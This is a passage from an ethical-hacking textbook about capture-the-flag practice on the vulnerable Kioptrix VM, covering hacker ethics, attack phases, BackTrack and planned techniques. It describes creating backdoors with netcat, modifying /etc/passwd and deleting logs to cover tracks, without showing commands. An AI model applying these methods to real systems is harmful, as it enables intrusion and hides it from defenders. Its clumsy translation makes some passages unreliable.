Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 1 from 74

Capture The Flag &

Hacking Kioptrix Server

Written by Alexander Lumbantobing

Albert Sagala

Zico Ekel

Published by TEKNOSAIN, Graha Ilmu

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 2 from 74

Capture The Flag & Hacking Kioptrix Server.

Copyright © 2016 by Alexander Lumbantobing, Albert Sagala and Zico Ekel.

All rights reserved. No part of this work may be reproduced or transmitted

in any form or by any means, electronic or mechanical, including

photocopying, recording, or by any information storage or retrieval system,

without the prior written permission of the copyright owner and the

publisher.

ISBN: 978-602-73914-5-1

First Edition, 2016.

Publisher: TEKNOSAIN, Graha Ilmu

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 3 from 74

This book is dedicate to God, family, friends, Del Institute of Technolgy,

Indonesian Baktrack Team, and esteemed readers.

Please contact author at: https://www.facebook.com/alexandertobing101

"The fear of the LORD is the beginning of knowledge"

- Proverbs 1: 7

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 4 from 74

FOREWORD

Praise and gratitude we pray to God Almighty for His grace and love that accompanied
the author during

the process of this book so that I can finish a book titled "Capture The Flag & Hacking
Kioptrix Server"

properly and on time.

The author would like to thank Mr. Albert Sagala, S.T., M.T., as Head of the Cyber
Security Research

Center Institute of Technology Del, who have provided input, direction, and guidance
during the work of

this guide. The author would like to thank Mr. Zee Eichel, the founder of Indonesian
Backtrack Team,

which has provided guidance, the science lesson about Backtrack. The author also
expressed thanks to

Rudy Samuel Pardosi and Doan Sinaga, as the core officials Del Cyber Army, which has
given me many

opportunities to work.

The authors are grateful to other colleagues, who greatly assist writers in completing
this book. Not to

forget, the authors express thanks to the publisher, the book, which is willing to help
publish this book in

order to distribute it.

Hopefully this book will be of benefit to all those who need them. The author also
realized that this book

is not free from errors. Therefore, the authors expect criticism and constructive
suggestions from
various parties are pleasing to read this book.

Please contact author at: https://www.facebook.com/alexandertobing101

Sitoluama, November 2014

ALEXANDER Lumbantobing

IT Researcher

Cyber Security Research Centre - Institute of Technology Del

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 5 from 74

TABLE OF CONTENTS

FOREWORD
...................................................................................................................................................
5

TABLE OF CONTENTS
.................................................................................................................................... 6

PRELIMINARY
...............................................................................................................................................
8

CHAPTER 1: INTRODUCTION TO HACKING

................................................................................................. 9

1.1. Hacker or Cracker

............................................................................................................................. 10

1.2. Ethical Hacking

................................................................................................................................. 11

1.2.1. Reconnaissance
......................................................................................................................... 13

1.2.2. Scanning and Enumeration

....................................................................................................... 15

1.2.3. Gaining
Access........................................................................................................................... 15

1.2.4. Maintaining Access

................................................................................................................... 16

1.2.5. Covering Tracks

......................................................................................................................... 16

1.3. Backtrack
..........................................................................................................................................
19

1.4. Kioptrix Server

.................................................................................................................................. 21

1.5. Conclusion
........................................................................................................................................
22

CHAPTER 2: SET-UP HACKING LAB

............................................................................................................ 23

2.1. Preliminary
.......................................................................................................................................
23

2.2. Preparation Software

....................................................................................................................... 23

2.3. Install a Guest Operating System Manually

..................................................................................... 24

CHAPTER 3: RECONNAISSANCE, SCANNING & ENUMERATION

............................................................... 26

3.1.

Preparing Backtrack
.................................................................................................................... 26

3.2.

Find and locate the target system

.............................................................................................. 27

3.3.

Information about the target server

........................................................................................... 28

CHAPTER 4: DETECTION SERVICE

.............................................................................................................. 29

4.1.

Figuring out the service list using nmap

..................................................................................... 29

4.2.

The conclusions of detection service

.......................................................................................... 30

CHAPTER 5: VULNERABILITY ASSESTMENT

.............................................................................................. 31

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 6 from 74

5.1.

Vulnerability Assestment using Mozilla Firefox

......................................................................... 31

5.2.

Vulnerability Assestment using OWASP Dir Buster

................................................................... 34

CHAPTER 6: EXPLOITATION
........................................................................................................................ 38

6.1.
Exploitation using SQL Inject Me
................................................................................................ 38

6.2.

Exploitation using SSH

................................................................................................................ 46

CHAPTER 7: GAINING ACCESS

................................................................................................................... 48

7.1.

Break from limited shell

.............................................................................................................. 48

7.2.

Looking processes run by root

.................................................................................................... 49

7.3.

Taking over access account mysqld

............................................................................................ 50

7.4.

Login as service mysqld

.............................................................................................................. 52

7.5.

Modify file /etc/passwd

............................................................................................................. 53

7.6.

Bukti bahwa kita adalah root

...................................................................................................... 57

CHAPTER 8: BACK DOOR

............................................................................................................................ 58

8.1.
Make a regular user as a back door
............................................................................................ 58

8.2.

Creating a user with root access as a back door

......................................................................... 60

CHAPTER 9: CLEARING TRACK

.................................................................................................................... 62

9.1.

Restoring user access rights of john

........................................................................................... 62

9.2.

Removing the entire file log

service............................................................................................ 63

CHAPTER 10: SET-UP CTF – Fast Hacking Competition

.............................................................................. 69

10.1.

Introduction
............................................................................................................................ 69

10.2.

SET-UP CTF – Fast Hacking Competition

................................................................................. 71

REFERENCE
..................................................................................................................................................
72

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 7 from 74
PRELIMINARY

This book is the English brief explanation of Capture The Flag & Hacking Kioptrix
Server. This

book is protected by ISBN: 978-602-73914-5-1.

This book is the result of collaborative work between "Computer Engineering Study
Program -

Cyber Security Research Center (CSRC), the Institute of Technology Del (IT Del)" with

"Indonesian Backtrack Team (IBT)". Exceptional collaboration between 'academic

research

institute of computer security' shared 'community ICT development community' make this
book

is perfect to be used as material for the academic research literature lecturer / student

computer security, as well as for the introduction of ICT security material on the general
public.

This book discusses how the author's experience as a truly very beginners, to learn and

understand about the world of hacking. In this book will be presented in a very simple
and very

interesting for hacking. Do not worry, because this book is ONLY intended for beginners
who

want to LEARN, it will be created a condition that is virtual, so it will not interfere with
the

existing system in the real world.

Software used in this book are: VMWare, Backtrack, and Kioptrix Server, Netdiscover,
Nmap,

WhatWeb, OWASP Dir Buster, OWASP Mantra Browser, and SQL Inject Me. A gap that
will be

studied are: Sensitive Data Exposure and SQL Injection. Knowledge will be held after
the

reading of this book is: Bypass Limited Shell SSH, Modify / etc / passwd, Create
backdoor root

account, and Covering tracks. This book will also add a bit of knowledge about the
competition

Capture The Flag, so that readers can better prepare themselves to compete, or to create
a

simple competition.

Please contact author at: https://www.facebook.com/alexandertobing101

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 8 from 74

CHAPTER 1:
INTRODUCTION TO
HACKING
Most people think that the hacker is someone who has the ability and exceptional
knowledge

about computers, so as to seek and gather valuable information and secrets. The term
hacker

has created an illusion as if to say that the hacker is a young computer experts who are

proficient in typing various computer commands, then the activities shown on the screen,
and

suddenly the target computer has been successfully taken over. On the computer screen
the

hacker, it appears that the passwords, account numbers, and other confidential
information

contained on the target computer, has been successfully obtained. But in fact, a good
hacker or

more commonly referred to as a security professional, works by hacking ethically.

Ethical

Hacking is hacking activities were carried out by following ethical hacking methodology
that has

prevailed as international statutes.

This book will teach you, how to do some basic ethical hacking techniques, and how to
use

tools that are widely used by hackers to collect data and attack the target computer. In
general,

the activities and the work of a hacker is confidential and should not be known by many
people,

but we will try to know a little about the hacker, and how to become an ethical hacker.
A farmer need a hoe to work, as well as hackers. Hackers use special software that
enabled him

to perform his job. By learning to have hacking skills and learn to use special software,
anyone

can become a hacker. In order for you to survive and protect yourself from malicious
hacker

attacks (malicious hackers), then you should be able to learn about the methodology of
ethical

hacking attacks (ethical hacking techniques). This book will discuss in detail the tools
(tools) and

techniques (techniques) in a very simple and interesting, which is used by hackers, so

we can

get to know hacker deeper. This book will try to guide you to become an ethical hacker,
a

hacker was good and professional.

The goal of Chapter 1 is to introduce you to the world of hackers. You will know who
the

hacker, how they work, what they can do, the terms used in the world of hackers, and
many

other things. Generally, the ethical hacker is a business area that promises big profits,
especially

if they work as penetration testing or shortened by the term pen testing. Pen testing is a

network security experts who dedicate themselves in identifying threats and security

vulnerabilities on a system or network, so they can give suggestions to improve security

on the

system or network. Of course, in addition, an ethical hacker must be able to understand

the

laws and regulations that might entrap him in jail if he is not careful in their work. An
ethical

hacker must be able to comply with laws and regulations, while he was working.
Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 9 from 74

1.1. Hacker or Cracker

Do not just have a bad assumption with the name of the hacker, because you have to
know

what the true hacker. The problem is, there is a group of people who mention themselves
as

hackers when they it was a cracker. Real hackers actually not as bad or even evil at all)
as most

people think. Hacker is a group or several groups that aim to develop the science

pengengetahuan and share information freely without limits. Hacker is someone who is

interested to learn in depth about the workings of a system, a computer, or a computer

network. They consist of a network expert programmers. They are also credited with
building

the Internet through the development of the UNIX operating system.

The term hacker himself was born around 1959 from MIT (Massacusetts Institute of

Technology), an American university which consists of intelligent people. It was then

that all

started, of a new room, "EAM room" in Building 26, MIT as an ancestor of the
computers that

we now know, the machine is capable of carrying us toward freedom of better

information.

The hackers have always cooperated voluntarily solve problems and build things. They
always

share information, provide answers and vying to do the best for the environment. They
never
stopped studying to become an expert and very anti to do something repetitive and
boring.

They are guided by the words of wisdom:

"To follow the road - look to the experts - follow the master - walked with the master -
the

master -Be identify the experts." - Manifesto The hackers.

Meanwhile, the cracker busy to satisfy themselves with a cracking activity. ranging from

breaking into computers, spread the virus without purpose, to circumvent the phone

(phreaking). There are some real hackers who write viruses but with a clear purpose,
such as for

research purposes, and others. The hackers called them lazy people who are not
responsible.

So, it is not fair if we still assume that the hacker was evil and scary because it is very
clear that

hackers are building a temporary cracker destructive nature.

Want to become a hacker ?? No word is difficult for those who want to learn. To be a
hacker

you have to master some programming languages and of course the attitudes that could
make

you welcome in their neighborhood. Usually, prospective hackers start by learning some

programming languages. Having mastered the basic capabilities above all, would-be
hackers are

advised to open any sati open-source version of UNIX or LINUX study, read the code,
modify it

and run it back. If you're having difficulty, it is advisable to communicate with Linux
users club.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 10 from 74

Many methods and tools that can be used to find vulnerable systems, run exploitation,
and to

take over the system. Having discovered vulnerabilities in the system, hackers can
exploit the

vulnerability and install malicious software. Trojans, backdoors, and rootkits are all
forms of

malicious software, also called malware. Malware is installed on a system that has been
hacked

after a vulnerability has been exploited. SQL Injection is one of the other methods that
can be

used to gain access to the computer system. SQL Injection is used primarily against the

application server that contains the database information. These technologies and
methods of

attacks will be discussed in the next chapter.

1.2. Ethical Hacking

This section will explain the purpose of ethical hacking and nothing are being made by
an

ethical hacker. As described previously, the ethical hacker must be able to do his job in
a

professional manner to distinguish him by malicious hackers. Gaining the trust of the
client, so

as not to interfere with the system, should be preserved and maintained either by an
ethical

hacker. One thing that pernting do an ethical hacker is to always ask for permissions to
the

owner of the system or network to do the job. This is why ethical hackers trustworthy in
doing

testing on a system or network security.

Hacker is a group or several groups that aim to develop the science pengengetahuan and
share

information freely without limits. Hacking is there any activities that aim to find security
holes

in the system. Ethical Hacking is hacking activities were done by following the
methodology has

been agreed internationally by the Ethical Hacker. Hackers who do not follow the
methodology

alone is not an ethical hacker (Ethical Hacker). The only difference between hackers
and

crackers are the motivation for hacking. Which memberdakan between Ethical Hacker
and Non-

Ethical Hacker is a methodology that is done during the hacking. Now, to conduct
hacking, not

required a lot of skill. Someone who does not have the skill though, can do the hacking.

Ethical hackers are usually motivated by a variety of reasons, but the goal remains the
same as

cracker, which is trying to find vulnerabilities that there is a system or network. When
hackers

have successfully entered into the system, they will not be satisfied, and will try to
extend the

system to her collapse. An ethical hacker must not only be able to do it all, but also must
be

able to provide advice or solutions on how to counteract or secure systems and

networks from

malicious hackers hacking attempt.

Many ethical hackers detect malicious hackers various activities as part of a team /
community

who are interested in and explore the science of system and network security. When
ethical
hackers are employed, they will ask, what is to be secured, of whom must be secured,
would be

willing to provide additional protection, and other matters. A security testing plan can
be

constructed by studying the data infrastructure that wants to be protected from security

threats.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 11 from 74

Doing documentation on the outcome of various testing that has been done is very
important

in producing a final product, namely pen test report. Take a screenshot of potentially
valuable

information or save a log file is very important to present the findings to the client in the
pen

test report. Pen test report is a compilation of all the risks that have the potential to
invade a

computer system or network system.

Good ethical hackers and malicious hackers, will set out to try to take over the system.
The

security system basically consists of four basic elements, namely:

1. Confidentiality,

2. Authenticity,

3. Integrity, and

4. Availability.

The goal of every hacker is to exploit the security hole on the system through the four
basic
elements. For example, when conducting denial-of-service (DoS) attacks, a hacker was
an attack

on the security hole found on availability of elements. Although DoS attacks can be
launched in

many forms, the main purpose of a DoS attack is to drain system resources and
bandwidth. An

order to overwhelm the system, will force the system to forcibly die early and therefore
can not

serve the client requests again.

Information theft, such as stealing passwords or other data, because the data is sent in

cleartext over the network media that is reliable, is an attack on the element of secrecy

(confidentiality), for the attack lets someone other than the recipient, to gain access to
data

that is being sent. This theft is not limited to data sent over the network only, the data on

servers, laptops, disk and tape backups can also be at risk. Corporate-owned devices
are full of

confidential information, so that if a hacker gained access to these devices, hackers will
be

easier to identify devices that may have security loopholes in the company.

Bit-flipping attack is considered an attack on the integrity of the element because the
data may

have been tampered with during transmission over the network; therefore, the system

administrator can not verify the data. Attacks bit-flipping are attacks using weaknesses

contained in the technique cipher cryptography (cryptographic cipher): namely by an

attacker

to change chipher text (cipher text) such a way as to produce a change predictions of
plain text

(text original), although the attacker did not learn the pattern of the plain text. This type
of
attack is not an attack leads to a cipher, however, leads to the message or series of
messages.

In extreme conditions, this attack could be a DoS attack against all messages on certain

channels by using the cipher. This attack is very dangerous when the attacker knows the
format

of a message transmitted over the network. Imagine, when the bit-flpping attacks done to

change the information on a digital signature, the attacker will be able to change a
promissory

note (letter of borrowing) stating "I owe $ 10.00" changed to "I owe $ 10,000."

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 12 from 74

MAC address spoofing attacks are the authentication because it allows unauthorized
devices

connecting to the network as the wireless network. By spoofing the MAC address of the

wireless station that is legitimate, the intruder can take the identity used by stations and

networks.

Ethical hacker who stay one step ahead of malicious hackers have to be experts in
computer

systems, and also to be very knowledgeable about computer programming, networks,

and

operating systems. Depth knowledge of the platform is very often used (such as
Windows, Unix,

and Linux) should also be able ruled by ethical hackers. Patience, persistence, and
perseverance

are very large, is an important quality, because of the length of time and the level of

concentration required for most of the attacks were launched. Networking skills, web
programming and databases, are useful in performing ethical hacking and vulnerability
testing

(vulnerability testing).

Most ethical hacker has extensive knowledge on computers and networks. In some
cases, an

ethical hacker will act as part of a "tiger team" that has been hired to test the network
and

computer system security loopholes and vulnerabilities. In this case, each team member
will

have different specialties, and ethical hackers may require more specialized skills in the
field of

computer systems and networks. Most ethical hackers have knowledge about the area of

security and related issues, but it does not always have a strong knowledge of
countermeasures

to prevent attacks. Able to understand and know the terminology in the hacking world is
an

important part of the responsibility of a CEH (Certified Ethical Hacking). This

terminology is

regulate how a professional security act according to ethics.

The stages of Ethical Hacking techniques are performed in order to take over the access
to the

target system are as follows:

1.2.1. Reconnaissance

"Reconnaissance (Information Gathering) Refers to the preparatory phase whre an

attacker seeks to gather as much information as possible about a the target of

evaluation prior to launching an attack" - Certified Ethical Hacker v6 Module 01

Introduction to Ethical Hacking, EC-Council.

This technique aims to obtain general information about the target as much as possible
to determine the type of attack that we will do. The activities included in this activity is
a

network scanning to determine potential targets.

Reconnaissance activities are divided into two, namely:

a. Passive Reconnaissance.

Passive Reconnaissance is a technique for collecting information by interacting

indirectly to the target. For example, by collecting information through the

Internet, newspapers, radio, and others.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 13 from 74

Passive surveillance (passive reconnaissance) involves gathering information on

potential targets without interacting directly to the company that we will attack.

Passive surveillance can be done in a very simple as observing the building

companies to identify when the time when the employee entered the building

and at the time when they leave. However, most of the reconnaissance done by

sitting at the computer, to search for information about potential targets, by

doing an Internet search on an individual or company to obtain information.

I'm sure many of you have been doing the same search on your own name or on

behalf of others, or simply to gather information about a topic. This process

when used to gather information on

targets companies that want to attack, commonly called the collection of

information (information gathering). Social engineering (social engineering) and

the collection of discarded files (dumpster diving) also considered the methods

of collecting information passively.

Sniffing the network is another way to do passive reconnaissance and can yield

useful information such as the range (range) of IP addresses, server or network

that is hidden, and other services available on the system or network. Sniffing

the network has the same mechanism of action of the control tower: the hacker

will oversee the entire data stream to see what activities are going on. Perform

network sniffing is a common weapon for many ethical hacker.

b. Active Reconnaissance.

Active Reconnaissance is a technique for collecting information by interacting

directly with the target. For example, by collecting information through call

custumer service or part of their technicians.

Active surveillance (active reconnaissance) is conducted by reconnaissance

jaaringan with direct interaction to acquire each host with the network, the IP

address of the server, and services on the network.

These surveillance activities have a greater risk than passive surveillance,

because it could have a system of early warning systems to anticipate what sort

of an impending attack, so the activity of active surveillance is often also referred

to as "knocking" (rattling the doorknobs).

Active surveillance can give hackers a general overview of the system's security,

but also increase the risk of being caught by the law, or at least increase the risk

of system security suspicions. A lot of software that perform active surveillance

can be identified and traced from the computer where it is run, thus increasing

the possibility of detection of a hacker.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 14 from 74

Both passive and active surveillance may lead to the discovery of useful

information to be used in the attacks. For example, it is easy to figure out the

type of web server and operating system (OS) used by the company. This

information allows hackers to find vulnerabilities in the web server and OS

version, to exploit the vulnerability tersebutdemi gain more access.

1.2.2. Scanning and Enumeration

"Scanning and enumeration Refers to the pre-attack phase when the hacker scans the
network

for specific information on the basis of information Gathered during reconnaissance" -

Certified

Ethical Hacker v6 05 Scanning Module, EC-Council.

This technique aims to collect in-depth information about the target, making it easier for
a

potential hacker to find a gap. The activities included in this activity is the use of tools
port

scanners, network mapping, sweeping, vulnerability scanners, and others.

There are three types of scanning, namely:

a. Port scanning. This type of scanning to collect detailed information about the open
ports

on the target system, so that hackers can study the potential gaps that may exist.

b. Network scanning. The aim of this type of scanning for mapping on a network. Once
the

network has been mapped, hackers can analyze a host of potentially vulnerable.
c. Vulnerability scanning. The aim of this type of scanning to check for vulnerabilities
that

may be present on the target system or network.

In general, the objective technique of scanning and enumeration is to detect active hosts
on the

network, to find out what ports are open on a host, to determine the type of operating
system

running on the target, to determine what services are running on a single host and to
obtain

information about the target IP address.

1.2.3. Gaining Access

"Gaining access Refers to the penetration phase. The hacker exploits the vulnerability in
the

system. "- Certified Ethical Hacker v6 System Hacking Module 07, EC-Council.

Mechanical gaining access (exploitation) aims to take advantage of gaps in order to gain
access

to the highest on target. The activities included in this activity is the use of tools of
exploitation

of loopholes, session hijacking, password cracking, and others.

Exploitation should be made to obtain the highest access on a system. In general, the

exploitation activities rely heavily on the use of exploits (exploit). Of exploit code or
application

that is used to exploit vulnerabilities found on the system.

An exploit is the realization of a vulnerability. exploits are issues or bugs in the

software code

that allow a hacker or attacker to alter the original functionality of the software. -
The Basics of

Hacking And Penetration Testing, Patrick Engebretson.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 15 from 74

Man-in-the-middle attacks (MITM) is one of the types of attacks that can be used to

memanfaatka loopholes contained in the network. In general connection, the client will

connect to the server directly. Then, the server will reply to the client computer
connection.

While in MITM connection, the client will be forced to connect to the computer first
attacker.

Then, the attacker will connect to the server. Then the server will be forced to seek a

connection to a computer attacker. Then, the attacker will establish a connection with the

client.

1.2.4. Maintaining Access

"Maintaining access Refers to the phase when the hacker tries to retain his / her
ownership of

the system." - Certified Ethical Hacker v6 System Hacking Module 07, EC-Council.

This technique aims to create a back door as quick access to master the target. Basically,
this

technique must be done immediately after gaining access to the highest in the system.
Hacker

reliable should immediately create a backdoor on the system that brhasil he controlled.

Nonetheless, the backdoor is not always created by hackers. Backdoor can also be
created by

the administrator to take over the system which has been controlled by hackers.
Backdoor

actually very vital role in terms of mastering the system. Backdoor can be used for
shortcuts to
master the system. Therefore, backdoor contained on the system can be used as material
for

grabs. We suppose A hacker has managed to control a system and has created a
backdoor.

Hacker B, when it managed to find the backdoor, also will control the system. It makes

backdoor a very useful weapon.

One of the tools that can be used to create a backdoor is netcat. Netcat commonly called
the

Swiss Army Knife. Netcat is a tool that can be used to test the security of systems and
networks.

In general, some uses netcat is a port scanner, banner grabbing, file transfer, software
stress

testing, testing firewalls, proxy testing, backdooring, and others.

1.2.5. Covering Tracks

"Covering tracks refer to the activities that the hacker does to hide his misdeeds." -
Certified

Ethical Hacker v6 System Hacking Module 07, EC-Council.

This technique aims to remove the trace during the hacking activity. In this technique, we
have

to delete all the logs that are on the system. Once hackers have gained and maintain
access,

then they will cover their tracks to avoid detection by security forces, by removing
evidence of

hacking, as all traces of the attack, log on the system, log on record IDS (intrusion
detection

system), and others ,

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]
page: 16 from 74

Thus, in the diagram, the methodology is as follows Ethical Hacking.

Reconnaissance

Scanning &

Covering Tracks

Enumeration

Maintaining

Gaining Access

Access

In addition, there are some things that should be followed for someone to become an
Ethical

Hacker, one of which is knowing four basic things following which must have basic
skills about

programming and networking, should have a basic knowledge of research security holes

(vulnerability research), must master basic concepts of hacking techniques, and should
be able

to follow the methodology applicable Ethical hacking.

A hacker reliable not just rely on technology in work. He also rely on its own
capabilities in

carrying out attacks with different techniques. Attacks can be categorized as passive or
active.

Passive and active attacks can be used on network security infrastructure and hosts to be

attacked. Active attacks can only make their systems or networks and increasing the risk
of

revenge attack is detected, whereas passive attack trying to get information from the
system

without interacting sehigga safer. Active attacks affect the availability, integrity, and
authenticity of data, while a passive attack only affects a breach of confidentiality.

In addition to active and passive category, attacks categorized as attacks from within or
an

outside attack. Attacks originating from inside is yag attack originated from within the
target

itself, and is usually caused by a "person" who has access to certain resources. While
external

attacks are attacks that originate from outside the target, such as from the Internet or
remote

access connections (remote access).

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 17 from 74

As a security professional, it is difficult to balance between adding additional

safeguards to

prevent an attack by functional users for the system to keep it running. Security,
functionality,

and ease of use is a triangle that represents a balance between the three essential
components

of a system. If we choose to increase the ratio of the two components, one component
will be

reduced ratio. If we improve the security and functionality of the system, the ease of use
of the
system will be reduced. In other words, the more secure and more functional system,
then

more and more complicated to use.

The basic capabilities of the programming and networking that must be owned by
Ethical

Hacker is understanding the concept of domains on networking, control the operation of

Windows, Unix, and Linux, has knowledge of the hardware and software on networking,

understand the basic concepts of network security, and has sufficient ability to be able to
attack

the target system technically.

Basic knowledge of security loopholes research (vulnerability research) that must be

owned by

an Ethical Hacker is the ability to find loopholes contained in a system, the ability to
design a

security loophole for simulation purposes, and the ability to follow the development of

information security to add insight. The ability of this vulnerability research is needed to

identify and resolve security flaws found on the network, to protect the network from
attack

intruders, to gather information to prevent security issues, and to gather information

about the

development of computer viruses.

A farmer need a hoe as a tool to facilitate his work, as well as an Ethical Hacker. An
Ethical

Hacker also need tools to work. The tool could facilitate an Ethical Hacker at work
(ethical

hacking). These include an operating system specifically built for penetration activities.
One

example of the operating system is Backtrack. A farmer also needs the land as the object
to be
her kelolah with a spade. An Ethical Hacker also need to be hacking targets. One
example of an

object that can be targeted is Kioptrix Server.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 18 from 74

1.3. Backtrack

A few years ago, open discussion about learning hacking techniques are still considered

somewhat taboo and less convenient for discussion. Now the time has changed
everything.

Now, people are starting to realize that it needs about the knowledge of hacking is very

precious. Offensive Security has now become an organization that embraces anyone
interested

in the world of security.

Even now pemeritah has taken a serious step toward computer security issues. Many

developers at Offensive Security who has a background as a government employee.

Some

reasons for these employees to join is to learn how to build and develop a system that is
safe

and reliable to be used by the public.

Finally, a new profession was born IT background. The profession is called penetration
testing.

This profession plays a very important role in all aspects of an organization's security.
Security

policy (security policy), estimates a security risk (risk assessments), the ongoing
security plans

(security continuity planning), and improvement of the system (disaster recovery) is a

very

important component to ensure the organization remains secure.

"Penetration testing Allows you to view your organization through the eyes of the
enemy." -

The Basics of Hacking And Penetration Testing.

Penetration testing process will find a lot of information that is needed to improve the
system

of an organization before an attacker who actually carried out the attack. One of the most

important things to learn hacking today is a great willingness to learn and the
availability of

learning materials that much. Each of tools for hacking in general will always
experience

improvements over time, to follow the development of computer security. Most of the
hacking

tools are open source and free so its very profitable.

There are many Operating Systems specially created to conduct penetration testing, one
was

Backtrack. Backtrack is the operating system which is a derivative of Linux, which is

used to

perform penetration testing (penetration testing) by the professionals. Backtrack can be

used

as a primary operating system, at boot time from LiveDVDs or use LiveUSB. Backtrack
been

customized so that every package, kernel configuration (kernel configuration), script and
patch

devoted user to perform penetration testing (penetration testing).

"BackTrack is intended for all audiences from the most savvy security professionals to
early

Newcomers to the information security field. "- Offensive Security.

Backtrack is a complex solution to study the science of hacking and perform penetration

testing. Backtrack is a beautiful dream every hacker who has become a reality. The
entire tools

contained in Backtrack is specifically designed to perform penetration testing. Backtrack

comes

with hundreds of security tools are installed, configured, and ready for immediate use.
The

good news is, Backtrack can be enjoyed for free. Backtrack Operating System can be

downloaded at http://www.Backtrack-linux.org/downloads/.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 19 from 74

At the time of our visit the link, we will be given the option to download Backtrack in
.ISO file

version or the version of VMWare image. If you choose to download Backtrack in .ISO
file

version, then you should do prior to burning a DVD, to be able to use the Backtrack. In
some

circumstances, you must change the boot configuration contained on the laptop or
computer,

so that the optical drive is a top priority at the time the system boots.

If you choose to download Backtrack in the version of VMWare image file, then you
must have

software that can perform virtualization. There are many applications that have
virtualization

capabilities. The app allows an operating system to run an operating system or another.
In

other words, the application can enable us to run more than one operating system
simultaneously, without the need to reboot.

Founder and main developer of Backtrack named Mati Aharoni and Max Mosser. Mati
Aharoni

was a security consultant from Israel. So Backtrack is formed of a community

collaboration.

Max Mosser is the author of a collection of security auditors specializing itself to the

development of software used in security penetration integrated with Linux.

The process of evolution of Backtrack to spend a lot of time in the development and
testing of

many security community. Backtrack basically began to be created with a version of

Linux live

DISTO named Whoppix, IWHAX, and Auditor. When the Backtrack created as a live
system that

is used for security audits without leaving a trace on used laptops. Development
continues to

be very widespread among the penetration of the security professionals in many

communities

around the world.

The developers Backtrack is composed of individuals with a background in languages,

regions,

industries, and different nationalities. They dedicate their personal time to ensure
Backtrack to

be used as a major tool in the entire security community. Backtrack has been
downloaded more

than four million downloads, and will continue to be developed to make better
backtrack.

The upgrade caused by improvements bugs, kernel driver support systems and tools
already

invalidated beberbagai the input in the previous version.

Backtrack operating system to appear in several types of options in terms of desktop

management. Ubuntu base is used as a core system on Backtrack, then so Backtrack also
follow

environtment contained desktop on Ubuntu. Backtrack operating systems can be run

using GUI

(Graphic User Interface), because some tools require a GUI interface to be used, such as

Zenmap, etherape, w3af gui, etc. One of the advantages of using GUI tools compared
with the

use of tools terminal GUI environment is the use of tools is considered more practical
and easy

(user friendly) in operation.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 20 from 74

1.4. Kioptrix Server

“Kioptrix is extreamly vulnerable Virtual Machine image. The object of the game is to
acquire

root access via any means possible. The purpose of these games are to learn the basic
tools and

techniques in vulnerability assessment and exploitation. There are more ways then one
to

successfully complete the challenges.” – Kioptrix Author’s.

Kioptrix adalah sebuah Sistem Operasi dalam bentuk Virtual Machine yang memiliki
banyak

celah keamanan. Tujuan diciptakannya Sistem Operasi ini adalah untuk memberikan

pemahaman dan pembelajaran mendasar mengenai metodologi dan proses dalam

melakukan
sebuah penetrasi keamanan. Ada begitu banyak cara yang dapat dilakukan untuk
mendapatkan

akses root pada sistem ini, hal ini menjadikan Sistem Operasi Kioptrix cocok sebagai
bahan

belajar dalam mengenal dunia keamanan komputer.

Actually, there are many ways to gain root access to the server Kioptrix. In this book,
we discuss

some very simple techniques to gain such access. Such techniques are:

1. SQL Injection.

Web server Kioptrix has loopholes SQL Injection. A SQL Injection attack consists of a

series of processes to enter SQL queries by exploiting loopholes contained in the data

input form. When SQL Injection attack succeeds, an attacker with access to the database

(such as: read, add, modify, and delete data), execute the command operations on the

database (such as shutting down the service DBMS), and try to target the root system

access. This technique will take advantage of the weakness of input validation on web.

One input is used for the experiment are quotes ( ').

Consequences caused by the SQL Inject gap is as follows:

a. Attackers have access to access and modify the database.

b. Attackers have access to execute commands on the database operations.

c. Allows attackers to gain access as root server system.

The use of this technique requires a basic knowledge of HTTP and database.

a. HTTP.

Hypertext Transfer Protocol (HTTP) is a protocol that is very widely used by

Internet. Each Web browser (eg Internet Explorer, Mozilla Firefox, and Google

Crome) and Web server (such as Google, Wikipedia, and Facebook) have to
communicate through this protocol to exchange information.

b. Web server.

Web server or Web site is a server that acts to serve all client requests through a

Web browser. The client's request will be processed, and then sent back to the

client. The results of the request is displayed by the Web browser client belongs.

c. Database.

The center of the Web server is a database. Database is a data storage medium

on a site. The data can be data costumer, web content data, the data entry

system, etc.

Capture The Flag & Hacking Kioptrix Server

2 January 2017

[ENGLISH-BRIEF EXPLANATION]

page: 21 from 74

2. Modify / etc / passwd.

All information is stored Kioptrix account on the server configuration file / etc /
passwd.

Therefore, we will make modifications to the file to be able to manipulate user access

rights we want.

The use of this technique requires a basic knowledge of the regulation of access and

user files on Linux.

a. Setting access files on Linux.

On Linux, setting the access of a file can be done via the command chmod. Each
file chmod Linux has a value which may be different from one another. To see

